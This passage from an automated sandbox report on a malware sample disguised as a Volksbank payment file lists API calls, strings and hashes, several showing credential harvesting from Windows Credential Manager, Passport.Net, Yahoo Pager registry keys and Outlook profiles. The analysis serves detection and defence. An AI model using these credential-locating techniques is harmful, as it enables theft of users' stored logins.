                                                                                                                                                                                                                                          • DrawFrameControl.USER32(00000000,?,00000003,00000008), ref: 004016E6
                                                                                                                                                                                                                                          • EndPaint.USER32(?,?), ref: 004016F3
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: MetricsPaintSystem$BeginClientControlDrawFrameRect
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 19018683-0
                                                                                                                                                                                                                                          • Opcode ID: 41a9f68717181b3a98dd3cb882205833d46fa89c93d8a9d4005197e1a3202613
                                                                                                                                                                                                                                          • Instruction ID: cf01e476fd02228c824cf2568a7310e823bc3a91870265851f050ef0b1242b16
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 41a9f68717181b3a98dd3cb882205833d46fa89c93d8a9d4005197e1a3202613
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 81012C76900218AFDF44DFE4DC849EE7B79FB45301F040569EA11AA1A4DAB0A904CB50
                                                                                                                                                                                                                                          Function 004063B2 Relevance: 8.9, APIs: 7, Instructions: 157COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040644F
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,00000060,?,?,00000000,?), ref: 00406462
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,00000060,?,?,?,?,?,00000000,?), ref: 00406475
                                                                                                                                                                                                                                            • Part of subcall function 00404888: memset.MSVCRT ref: 004048C2
                                                                                                                                                                                                                                            • Part of subcall function 00404888: memset.MSVCRT ref: 004048D6
                                                                                                                                                                                                                                            • Part of subcall function 00404888: memset.MSVCRT ref: 004048EA
                                                                                                                                                                                                                                            • Part of subcall function 00404888: memcpy.MSVCRT(?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?,?,?), ref: 004048FC
                                                                                                                                                                                                                                            • Part of subcall function 00404888: memcpy.MSVCRT(?,00406667,?,?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?), ref: 0040490E
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,00000014,?,00000040,00406667,00000060,?,?,?,00000040,00406667,?,?,?), ref: 004064B9
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,00000060,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 004064CC
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,00000014,?,00000040,00406667,?,?,?,?,?,?,?,?,?), ref: 004064F9
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,00000014,?,?,?,?,?,?,?,?,?), ref: 0040650E
                                                                                                                                                                                                                                            • Part of subcall function 00406286: memcpy.MSVCRT(?,?,00000008,?,?,?,?,?), ref: 004062B2
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: memcpy$memset
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 438689982-0
                                                                                                                                                                                                                                          • Opcode ID: d6e541f26a2e21c8c6d6048cbe16156117454f978ff945f7822072589e58f8d2
                                                                                                                                                                                                                                          • Instruction ID: e4a864fa4e69ec142fe4fd7b7713e32d962165e503c4b70a0fc0dcfbb4c29d3a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d6e541f26a2e21c8c6d6048cbe16156117454f978ff945f7822072589e58f8d2
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 41415FB290054DBEEB51DAE9CC41EEFBB7CAB48344F004476F708F7151E634AA498BA5
                                                                                                                                                                                                                                          Function 0044493E Relevance: 8.9, APIs: 7, Instructions: 147stringCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0044495F
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00444978
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0044498C
                                                                                                                                                                                                                                            • Part of subcall function 00444462: strlen.MSVCRT ref: 0044446F
                                                                                                                                                                                                                                          • strlen.MSVCRT ref: 004449A8
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 004449CD
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,00000008,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 004449E3
                                                                                                                                                                                                                                            • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000008,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D296
                                                                                                                                                                                                                                            • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2C2
                                                                                                                                                                                                                                            • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2D8
                                                                                                                                                                                                                                            • Part of subcall function 0040D2A3: memcpy.MSVCRT(?,?,00000010,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 0040D30F
                                                                                                                                                                                                                                            • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D319
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,00000008,?,?,?,?,00000008,?,00000000,00000000), ref: 00444A23
                                                                                                                                                                                                                                            • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D248
                                                                                                                                                                                                                                            • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D272
                                                                                                                                                                                                                                            • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2EA
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: memcpymemset$strlen
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2142929671-0
                                                                                                                                                                                                                                          • Opcode ID: 222256a1374bd43cf022861c561c1c3192c4ec1bcf54050736f6a4219f509775
                                                                                                                                                                                                                                          • Instruction ID: aa4dc9b89352709bd4c521be83aedc2b1fb2a96970f66ede65b30d7c79a4835d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 222256a1374bd43cf022861c561c1c3192c4ec1bcf54050736f6a4219f509775
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 96513B7290015DAFDB10EF95CC81AEEB7B8FB44308F5445AAE509A7141EB34EA898F94
                                                                                                                                                                                                                                          Function 00408DB6 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 100stringCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • _mbscpy.MSVCRT(0045A550,strings,?,?,00409CE2,?,?,?,?,?,00000000,76940A60), ref: 00408E31
                                                                                                                                                                                                                                            • Part of subcall function 00409240: _itoa.MSVCRT ref: 00409261
                                                                                                                                                                                                                                          • strlen.MSVCRT ref: 00408E4F
                                                                                                                                                                                                                                          • LoadStringA.USER32(00000000,0000000D,?,?), ref: 00408E7F
                                                                                                                                                                                                                                          • memcpy.MSVCRT(00000000,00000001,?,?,?,?,?,00000000,76940A60), ref: 00408EBE
                                                                                                                                                                                                                                            • Part of subcall function 00408D34: ??2@YAPAXI@Z.MSVCRT(00008000,00408DC4,00409CE2,?,?,?,?,?,00000000,76940A60), ref: 00408D5C
                                                                                                                                                                                                                                            • Part of subcall function 00408D34: ??2@YAPAXI@Z.MSVCRT(00000000,00008000,00408DC4,00409CE2,?,?,?,?,?,00000000,76940A60), ref: 00408D7A
                                                                                                                                                                                                                                            • Part of subcall function 00408D34: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00008000,00408DC4,00409CE2,?,?,?,?,?,00000000,76940A60), ref: 00408D98
                                                                                                                                                                                                                                            • Part of subcall function 00408D34: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00008000,00408DC4,00409CE2,?,?,?,?,?,00000000,76940A60), ref: 00408DA8
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ??2@$LoadString_itoa_mbscpymemcpystrlen
                                                                                                                                                                                                                                          • String ID: strings
                                                                                                                                                                                                                                          • API String ID: 4036804644-3030018805
                                                                                                                                                                                                                                          • Opcode ID: fb972dfd3e57adfc3ba40d615c3f9c5d1a1752d68bd78c6c00ac9518cee6e209
                                                                                                                                                                                                                                          • Instruction ID: 8088189cea062d7f30cfe1d816b9e84d6c9af13e32ba145f50863190e1f773ff
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fb972dfd3e57adfc3ba40d615c3f9c5d1a1752d68bd78c6c00ac9518cee6e209
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4B3170B1101722AFD715DB15ED41E733766E7803067124A3FE981972A3CB39E8A1CB9E
                                                                                                                                                                                                                                          Function 0040F6E2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 97stringCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                                                                                                                                                                                                                                            • Part of subcall function 004045DB: LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                                                                                                                                                                                                                                            • Part of subcall function 004045DB: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                                                                                                                                                                                                                                            • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                                                                                                                                                                                                                                            • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                                                                                                                                                                                                                                            • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                                                                                                                                                                                                                                            • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                                                                                                                                                                                                                                            • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                                                                                                                                                                            • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000100,000000FF,00000000,00000000,?,?,?,?,00000000), ref: 0040F7AE
                                                                                                                                                                                                                                          • strlen.MSVCRT ref: 0040F7BE
                                                                                                                                                                                                                                          • _mbscpy.MSVCRT(00000000,?,?,00000000), ref: 0040F7CF
                                                                                                                                                                                                                                          • LocalFree.KERNEL32(00000000,?,00000000), ref: 0040F7DC
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AddressProc$LibraryLoad_mbscpy$ByteCharFreeLocalMultiWidestrlen
                                                                                                                                                                                                                                          • String ID: Passport.Net\*
                                                                                                                                                                                                                                          • API String ID: 2329438634-3671122194
                                                                                                                                                                                                                                          • Opcode ID: ac5e77b6697e9ee94173e4e8c28d13e758311ae62a0014aa2ab67cc322a84761
                                                                                                                                                                                                                                          • Instruction ID: cbd5109d0b46f6ae46d16b49076c688dceaf9cc559dd015bf255ce3d8649dee3
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ac5e77b6697e9ee94173e4e8c28d13e758311ae62a0014aa2ab67cc322a84761
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 98316F76900109ABDB10EFA6DD45DAEB7B9EF89300F10007BE605F7291DB389A04CB59
                                                                                                                                                                                                                                          Function 004032B7 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 82stringCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00403166: strchr.MSVCRT ref: 0040327B
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040330B
                                                                                                                                                                                                                                          • GetPrivateProfileSectionA.KERNEL32(Personalities,?,000003FE,?), ref: 00403325
                                                                                                                                                                                                                                          • strchr.MSVCRT ref: 0040335A
                                                                                                                                                                                                                                            • Part of subcall function 004023E5: _mbsicmp.MSVCRT ref: 0040241D
                                                                                                                                                                                                                                          • strlen.MSVCRT ref: 0040339C
                                                                                                                                                                                                                                            • Part of subcall function 004023E5: _mbscmp.MSVCRT ref: 004023F9
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: strchr$PrivateProfileSection_mbscmp_mbsicmpmemsetstrlen
                                                                                                                                                                                                                                          • String ID: Personalities
                                                                                                                                                                                                                                          • API String ID: 2103853322-4287407858
                                                                                                                                                                                                                                          • Opcode ID: 5b98b57a55da65def1d776efa7645d3f4e73defe10c1c776d6f69e105cfa83b8
                                                                                                                                                                                                                                          • Instruction ID: 7d10b282734f65fdb38f5d5bab0bdada953f1de7ece3d1168d652590bcd45cd6
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5b98b57a55da65def1d776efa7645d3f4e73defe10c1c776d6f69e105cfa83b8
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6C21A872A041486AEB11EF699C81ADEBB7C9B51305F14007BFB04F7181DA7CDB46C66D
                                                                                                                                                                                                                                          Function 00444551 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 51registryCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00444573
                                                                                                                                                                                                                                            • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00410E4A,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 00410AAF
                                                                                                                                                                                                                                            • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00410E73,?,?,?,?,00410E73,00000000,?,?), ref: 00410AF8
                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 004445DF
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CloseOpenQueryValuememset
                                                                                                                                                                                                                                          • String ID: EOptions string$Software\Yahoo\Pager$Yahoo! User ID
                                                                                                                                                                                                                                          • API String ID: 1830152886-1703613266
                                                                                                                                                                                                                                          • Opcode ID: c25afbc6681bd6f67a4f4f243a5a512b3b390374a029d0210c15856865fede48
                                                                                                                                                                                                                                          • Instruction ID: e49b40feb516e52fd010a51085a75c79e183d02607987ed0dc43077d9115a6c0
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c25afbc6681bd6f67a4f4f243a5a512b3b390374a029d0210c15856865fede48
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E80196B6A00118BBEF11AA569D01F9A777CDF90355F1000A6FF08F2212E6749F599698
                                                                                                                                                                                                                                          Function 00406D77 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29windowCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?), ref: 00406D87
                                                                                                                                                                                                                                          • sprintf.MSVCRT ref: 00406DAF
                                                                                                                                                                                                                                          • MessageBoxA.USER32(00000000,?,Error,00000030), ref: 00406DC8
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ErrorLastMessagesprintf
                                                                                                                                                                                                                                          • String ID: Error$Error %d: %s
                                                                                                                                                                                                                                          • API String ID: 1670431679-1552265934
                                                                                                                                                                                                                                          • Opcode ID: 01084951b307502bfaf43d4fbd3e54dffba0eab1b535d90173241ec551fbeaa7
                                                                                                                                                                                                                                          • Instruction ID: a7eabb7ac59324d00fe13b249bdc4a7432a02f94c8438c44d3dfd779c6ab1540
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 01084951b307502bfaf43d4fbd3e54dffba0eab1b535d90173241ec551fbeaa7
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AEF0A77A8001086BDB10A7A4DC05FA676BCBB44344F1500B6B945F2151EA74DA058F98
                                                                                                                                                                                                                                          Function 0043DF30 Relevance: 8.0, APIs: 3, Strings: 2, Instructions: 479COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0043DFC5
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0043DFFE
                                                                                                                                                                                                                                          • memcpy.MSVCRT(00000001,B2850F59,00000000,?,00000001,00000000), ref: 0043E27C
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: memset$memcpy
                                                                                                                                                                                                                                          • String ID: $no query solution
                                                                                                                                                                                                                                          • API String ID: 368790112-326442043
                                                                                                                                                                                                                                          • Opcode ID: f59ee7c535991b4e4c1e2cd699b4550ba87100c19ab38750288448e459f31128
                                                                                                                                                                                                                                          • Instruction ID: 13ed0bad29dc8f20330308844ce1f2220340576076c9bd20db88b336710dfa55
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f59ee7c535991b4e4c1e2cd699b4550ba87100c19ab38750288448e459f31128
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 46128A75D01619DFCB24CF9AC481AAEB7F1FF08314F14916EE895AB391D338A981CB58
                                                                                                                                                                                                                                          Function 004309ED Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 238COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          • foreign key on %s should reference only one column of table %T, xrefs: 00430A3D
                                                                                                                                                                                                                                          • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 00430A65
                                                                                                                                                                                                                                          • unknown column "%s" in foreign key definition, xrefs: 00430C59
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: memcpy
                                                                                                                                                                                                                                          • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                                                                                                                                                                                          • API String ID: 3510742995-272990098
                                                                                                                                                                                                                                          • Opcode ID: e0adb55311b2422536510ae49f56a80dd71403a501fe8d14b1b43f202caa477a
                                                                                                                                                                                                                                          • Instruction ID: 56a33166dce8f22c91c9f8fabbbf61fd3f81eb66f6c7064346fd2a8112c6bbd6
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e0adb55311b2422536510ae49f56a80dd71403a501fe8d14b1b43f202caa477a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 32A14A71A00209DFCB14DF98D5909AEBBF1FF49704F24925EE805AB312D739EA41CB98
                                                                                                                                                                                                                                          Function 0043D62C Relevance: 7.7, APIs: 4, Strings: 1, Instructions: 224COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: memset
                                                                                                                                                                                                                                          • String ID: H
                                                                                                                                                                                                                                          • API String ID: 2221118986-2852464175
                                                                                                                                                                                                                                          • Opcode ID: b7a38b27e5c8f908588e1f47af6482a11fcf8a0e9f714cd4a67b4b1e91083b9c
                                                                                                                                                                                                                                          • Instruction ID: 41a1901620add3bbd0c629c105807ca0f7ae5b253a5bd6696a221ab72d79fc9a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b7a38b27e5c8f908588e1f47af6482a11fcf8a0e9f714cd4a67b4b1e91083b9c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C0916C75D00219DFDF24DFA5D881AEEB7B5FF48300F10849AE959AB201E734AA45CF98
                                                                                                                                                                                                                                          Function 0042563B Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 176COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: memcpy
                                                                                                                                                                                                                                          • String ID: out of memory$statement aborts at %d: [%s] %s$string or blob too big
                                                                                                                                                                                                                                          • API String ID: 3510742995-3170954634
                                                                                                                                                                                                                                          • Opcode ID: f23b84750750ded9f2ffe7c3d94913c2e203849674d50945dde1510e429b7173
                                                                                                                                                                                                                                          • Instruction ID: e987c9c84479fff69dc62f11a90029b17cbd8b5ab9a96ddea988199e68ce63eb
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f23b84750750ded9f2ffe7c3d94913c2e203849674d50945dde1510e429b7173
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2361C235B006259FCB04DF68E484BAEFBF1BF44314F55809AE904AB352D738E980CB98
                                                                                                                                                                                                                                          Function 0041DB51 Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 176COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 0041384F: memcpy.MSVCRT(?,00417664,00000004,?,CwA,00417664,?,?,00417743,?,?,?,?), ref: 0041385C
                                                                                                                                                                                                                                          • memcmp.MSVCRT(?,?,00000004,00000000,?,?,0041DE5E,?,?,?,?,00436073), ref: 0041DBAE
                                                                                                                                                                                                                                          • memcmp.MSVCRT(?,SQLite format 3,00000010,00000000,?,?,0041DE5E,?,?,?), ref: 0041DBDB
                                                                                                                                                                                                                                          • memcmp.MSVCRT(?,@ ,00000003,?,?,?,00000000,?,?,0041DE5E,?,?,?), ref: 0041DC47
                                                                                                                                                                                                                                          Strings
